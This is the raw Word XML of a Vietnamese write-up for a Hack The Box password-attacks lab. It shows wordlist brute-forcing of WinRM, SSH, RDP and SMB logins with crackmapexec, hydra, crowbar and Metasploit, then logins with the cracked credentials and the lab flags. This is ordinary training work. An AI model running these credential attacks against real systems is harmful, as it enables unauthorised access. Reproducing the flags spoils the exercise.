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EAA3F" w14:textId="7CE9B72D" w:rsidR="00AC3FB4" w:rsidRDefault="00AC3FB4" w:rsidP="00AC3FB4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Tải file Password-Attack.zip từ Resource .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3ABBC0" w14:textId="4C53A78C" w:rsidR="00CF43A9" w:rsidRDefault="00405DFB" w:rsidP="00AC3FB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00405DFB">
        <w:t>Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CEF136" w14:textId="7EEE434C" w:rsidR="00EA34BF" w:rsidRDefault="00EA34BF" w:rsidP="00F55629">
      <w:r>
        <w:t>Sử dụng từ điển để tìm kiếm username và password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E6790B" w14:textId="36A234C3" w:rsidR="00F55629" w:rsidRDefault="00F55629" w:rsidP="00F55629">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03989212" w14:textId="03565B91" w:rsidR="00F55629" w:rsidRDefault="00BB694C" w:rsidP="00F55629">
      <w:r w:rsidRPr="00BB694C">
        <w:t>crackmapexec winrm 10.129.169.128 -u /root/Password-Attacks/username.list -p /root/Password-Attacks/password.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA880BF" w14:textId="7014FD3C" w:rsidR="00F55629" w:rsidRDefault="00F55629" w:rsidP="00F55629">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650B8DA" w14:textId="7F1841A3" w:rsidR="00962E47" w:rsidRDefault="00962E47" w:rsidP="00F55629">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="609B0C4A" wp14:editId="7DBE1C5A">
            <wp:extent cx="5943600" cy="3662045"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2031174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7449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5D1" w14:textId="33288C9B" w:rsidR="007009E2" w:rsidRDefault="00962E47" w:rsidP="00962E47">
      <w:r>
        <w:t>Ta tìm được username : john , password : november</w:t>
      </w:r>
      <w:r w:rsidR="007009E2">
        <w:t xml:space="preserve"> dùng để kết nối từ xa thông qua giao thức winrm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE6BF9" w14:textId="7446AC06" w:rsidR="007009E2" w:rsidRDefault="002C52D1" w:rsidP="00962E47">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC51B59" w14:textId="404DD91A" w:rsidR="002C52D1" w:rsidRDefault="002C52D1" w:rsidP="00962E47">
      <w:r w:rsidRPr="002C52D1">
        <w:t>evil-winrm -i 10.129.169.128 -u "john" -p "november"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D61D78" w14:textId="63ED4EE0" w:rsidR="002C52D1" w:rsidRDefault="002C52D1" w:rsidP="00962E47">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2E828" w14:textId="6AB6B41E" w:rsidR="00606D65" w:rsidRDefault="00606D65" w:rsidP="00962E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E28D982" wp14:editId="4EF8D790">
            <wp:extent cx="5943600" cy="5229225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17851558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5581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38E" w14:textId="02B256FD" w:rsidR="00606D65" w:rsidRDefault="00606D65" w:rsidP="00962E47">
      <w:r>
        <w:t xml:space="preserve">Tìm được flag </w:t>
      </w:r>
      <w:r w:rsidRPr="00606D65">
        <w:t>HTB{That5Novemb3r}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F730C1B" w14:textId="70967633" w:rsidR="00606D65" w:rsidRDefault="00606D65" w:rsidP="00962E47">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00606D65">
        <w:t xml:space="preserve"> HTB{That5Novemb3r}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AECBFDF" w14:textId="612AECBC" w:rsidR="00405DFB" w:rsidRDefault="00405DFB" w:rsidP="00962E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00405DFB">
        <w:t> Find the user for the SSH service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D6C58B" w14:textId="0B812081" w:rsidR="00EB7489" w:rsidRDefault="00EB7489" w:rsidP="00EB7489">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3F2A28" w14:textId="5AF2E6BA" w:rsidR="00EB7489" w:rsidRDefault="00EB7489" w:rsidP="00EB7489">
      <w:r w:rsidRPr="00EB7489">
        <w:t>hydra -L /root/Password-Attacks/username.list -P /root/Password-Attacks/password.list  ssh://10.129.169.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920A095" w14:textId="66B787B8" w:rsidR="00EB7489" w:rsidRDefault="00EB7489" w:rsidP="00EB7489">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFF8AAB" w14:textId="15805C43" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="00EB7489">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78602A1D" wp14:editId="177FD7D2">
            <wp:extent cx="5943600" cy="1506220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116754898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8981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2DEF" w14:textId="79FC382D" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="00EB7489">
      <w:r>
        <w:t xml:space="preserve">Kết nối thông qua giao thức ssh với username password tìm được </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9DF6E" w14:textId="6A2C40C4" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="00EB7489">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF9C879" w14:textId="77777777" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="009D729F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lyquockhanh)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C9FD4" w14:textId="77777777" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="009D729F">
      <w:r>
        <w:t>└─# ssh dennis@10.129.169.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F562D0" w14:textId="6DC94383" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="009D729F">
      <w:r>
        <w:t xml:space="preserve">dennis@10.129.169.128's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC901E" w14:textId="77777777" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="009D729F">
      <w:r>
        <w:t>Microsoft Windows [Version 10.0.17763.1637]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22795E0D" w14:textId="5D2FDA72" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="009D729F">
      <w:r>
        <w:t>(c) 2018 Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC04A6" w14:textId="2519E740" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="009D729F">
      <w:r>
        <w:t>dennis@WINSRV C:\Users\dennis&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085D4FB4" w14:textId="10540056" w:rsidR="009D729F" w:rsidRDefault="009D729F" w:rsidP="009D729F">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59407F4A" w14:textId="4F44E9D2" w:rsidR="005363D0" w:rsidRDefault="005363D0" w:rsidP="009D729F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21CAEC57" wp14:editId="7931864D">
            <wp:extent cx="5105400" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="243076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7608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6A90" w14:textId="1EEEEA54" w:rsidR="005363D0" w:rsidRDefault="00437271" w:rsidP="009D729F">
      <w:r>
        <w:t>Đọc file flag.txt</w:t>
      </w:r>
      <w:r w:rsidR="005363D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D48FED" w14:textId="069674FD" w:rsidR="005363D0" w:rsidRDefault="005363D0" w:rsidP="009D729F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5512B8B1" wp14:editId="71D3A82C">
            <wp:extent cx="4678680" cy="1974714"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="1813309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0971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022" cy="19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662" w14:textId="62D79711" w:rsidR="00414149" w:rsidRDefault="00414149" w:rsidP="009D729F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414149">
        <w:t xml:space="preserve"> HTB{Let5R0ck1t</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF29C49" w14:textId="10DB6CA6" w:rsidR="00405DFB" w:rsidRDefault="00405DFB" w:rsidP="00962E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00405DFB">
        <w:t>Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185B6841" w14:textId="71A464CE" w:rsidR="005013B8" w:rsidRDefault="005013B8" w:rsidP="00147286">
      <w:r>
        <w:t>Việc sử dụng hydra không thể đưa kết quả username password nên ta sử dụng công cụ crowbar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2120D5" w14:textId="4393CE3A" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D58181" w14:textId="6171C703" w:rsidR="00147286" w:rsidRDefault="002E6915" w:rsidP="00147286">
      <w:r w:rsidRPr="002E6915">
        <w:t>crowbar -b rdp -s 10.129.210.180/32 -U /root/Password-Attacks/username.list -C /root/Password-Attacks/password.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFCBE92" w14:textId="2533B8D7" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F988693" w14:textId="46BEF21A" w:rsidR="005013B8" w:rsidRDefault="005013B8" w:rsidP="00147286">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="265A992D" wp14:editId="1D0E2AFC">
            <wp:extent cx="5943600" cy="947420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="788973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38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0343" w14:textId="7B80F028" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A61145" w14:textId="04C04912" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:r w:rsidRPr="00147286">
        <w:t>xfreerdp /v:10.129.169.128 /u:chris /p:789456123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6151627E" w14:textId="4D236BBC" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA8DFC" w14:textId="73AFA399" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34242499" wp14:editId="2542CC93">
            <wp:extent cx="5943600" cy="2296795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1120378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893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ACE9" w14:textId="77777777" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Xem được flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6084C0" w14:textId="0A06A4CC" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BECEEB7" wp14:editId="6F69091B">
            <wp:extent cx="3848100" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="140916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41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026B" w14:textId="334E37E4" w:rsidR="00147286" w:rsidRDefault="00147286" w:rsidP="00147286">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00147286">
        <w:t xml:space="preserve"> HTB{R3m0t3DeskIsw4yT00easy}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6064766C" w14:textId="575D5CDD" w:rsidR="00405DFB" w:rsidRDefault="00405DFB" w:rsidP="00962E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00405DFB">
        <w:t>Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676AE448" w14:textId="790B2139" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FDB9D0" w14:textId="7327F068" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274FBC8A" w14:textId="3CAACCCF" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>use auxiliary/scanner/smb/smb_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19116E" w14:textId="51A92AE5" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685B658F" w14:textId="07B2D7FB" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E61E29" w14:textId="22DECD68" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587AD6C9" wp14:editId="0C778FC6">
            <wp:extent cx="5943600" cy="2700655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="78029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38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D3E9" w14:textId="39F33DB6" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0A435" w14:textId="362E8001" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r w:rsidRPr="00CA1ECE">
        <w:t>set RHOSTS 10.129.169.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F8DD48" w14:textId="339E0CCC" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r w:rsidRPr="00CA1ECE">
        <w:lastRenderedPageBreak/>
        <w:t>set USER_FILE /root/Password-Attacks/username.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1314E640" w14:textId="452BB9CA" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r w:rsidRPr="00CA1ECE">
        <w:t>set PASS_FILE /root/Password-Attacks/password.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C125998" w14:textId="5A90B305" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D999F2" w14:textId="4FD103C9" w:rsidR="00CA1ECE" w:rsidRDefault="00CA1ECE" w:rsidP="00CA1ECE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="208B2118" wp14:editId="359B2F93">
            <wp:extent cx="5943600" cy="1454785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11848286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863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D72B" w14:textId="58E1C8E9" w:rsidR="002658BC" w:rsidRDefault="002658BC" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DBECFC" w14:textId="1F753EF9" w:rsidR="002658BC" w:rsidRDefault="002658BC" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368BFADE" w14:textId="3329AB06" w:rsidR="002658BC" w:rsidRDefault="002658BC" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E9968" w14:textId="71100330" w:rsidR="002658BC" w:rsidRDefault="002658BC" w:rsidP="00CA1ECE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E573DC7" wp14:editId="443C13E7">
            <wp:extent cx="5943600" cy="5220335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17846344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3448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7395" w14:textId="145791EA" w:rsidR="000044B0" w:rsidRDefault="000044B0" w:rsidP="00CA1ECE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61622814" w14:textId="5914B753" w:rsidR="000044B0" w:rsidRDefault="000044B0" w:rsidP="00CA1ECE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000044B0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -U cassie -L </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00C45DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>\\\\10.129.169.128</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DC76B41" w14:textId="01A3B6F4" w:rsidR="000044B0" w:rsidRDefault="000044B0" w:rsidP="00CA1ECE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674754E" w14:textId="77777777" w:rsidR="002F77F8" w:rsidRDefault="002F77F8" w:rsidP="00CA1ECE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D26269" w14:textId="2D46235D" w:rsidR="002658BC" w:rsidRDefault="000044B0" w:rsidP="00CA1ECE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61843009" wp14:editId="1FEBAF89">
            <wp:extent cx="5943600" cy="1882775"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1436217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1775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E91" w14:textId="4AB54DF2" w:rsidR="000044B0" w:rsidRDefault="009A3237" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEECB5C" w14:textId="5F79C785" w:rsidR="009A3237" w:rsidRDefault="009A3237" w:rsidP="00CA1ECE">
      <w:r w:rsidRPr="009A3237">
        <w:t xml:space="preserve">smbclient -U cassie  </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00C45DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\\\10.129.169.128\\CASSIE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68E32036" w14:textId="6C57B186" w:rsidR="00494D29" w:rsidRDefault="009A3237" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FD2C17" w14:textId="7EA1A86C" w:rsidR="00494D29" w:rsidRDefault="00494D29" w:rsidP="00CA1ECE">
      <w:r>
        <w:t xml:space="preserve">Và tải file flag.txt về máy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A74DFB" w14:textId="1AC734E4" w:rsidR="002F77F8" w:rsidRDefault="002F77F8" w:rsidP="00CA1ECE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="539604E4" wp14:editId="094CE357">
            <wp:extent cx="5943600" cy="1977390"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="131632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206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93C8" w14:textId="040BD7C3" w:rsidR="00494D29" w:rsidRDefault="00494D29" w:rsidP="00CA1ECE">
      <w:r>
        <w:t>Xem file flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F1973" w14:textId="0DD299ED" w:rsidR="00494D29" w:rsidRDefault="00494D29" w:rsidP="00CA1ECE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6367D244" wp14:editId="75A8C495">
            <wp:extent cx="3143250" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="169004241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241" name="Picture 1" descr="A close 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B24" w14:textId="2D80B2E0" w:rsidR="00494D29" w:rsidRDefault="00494D29" w:rsidP="00CA1ECE">
      <w:r>
        <w:t xml:space="preserve">P/s : </w:t>
      </w:r>
      <w:r w:rsidRPr="00494D29">
        <w:t>HTB{S4ndM4ndB33}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00494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05CC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04C0B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3D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84485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128431">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="446198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A9"/>
    <w:rsid w:val="000044B0"/>
    <w:rsid w:val="00147286"/>
    <w:rsid w:val="002658BC"/>
    <w:rsid w:val="002C52D1"/>
    <w:rsid w:val="002E6915"/>
    <w:rsid w:val="002F77F8"/>
    <w:rsid w:val="00405DFB"/>
    <w:rsid w:val="00414149"/>
    <w:rsid w:val="00437271"/>
    <w:rsid w:val="00494D29"/>
    <w:rsid w:val="004D20C7"/>
    <w:rsid w:val="005013B8"/>
    <w:rsid w:val="005363D0"/>
    <w:rsid w:val="00606D65"/>
    <w:rsid w:val="006904D5"/>
    <w:rsid w:val="007009E2"/>
    <w:rsid w:val="00962E47"/>
    <w:rsid w:val="009A3237"/>
    <w:rsid w:val="009D729F"/>
    <w:rsid w:val="00A31572"/>
    <w:rsid w:val="00AC3FB4"/>
    <w:rsid w:val="00BB694C"/>
    <w:rsid w:val="00CA1ECE"/>
    <w:rsid w:val="00CF43A9"/>
    <w:rsid w:val="00EA34BF"/>
    <w:rsid w:val="00EB7489"/>
    <w:rsid w:val="00F5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D4CE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{60323B1C-BDAA-4D5C-8DA1-507046D9C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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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44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4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file:///\\\\10.129.169.128\\CASSI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file:///\\\\10.129.169.128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16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-19T05:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-19T13:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>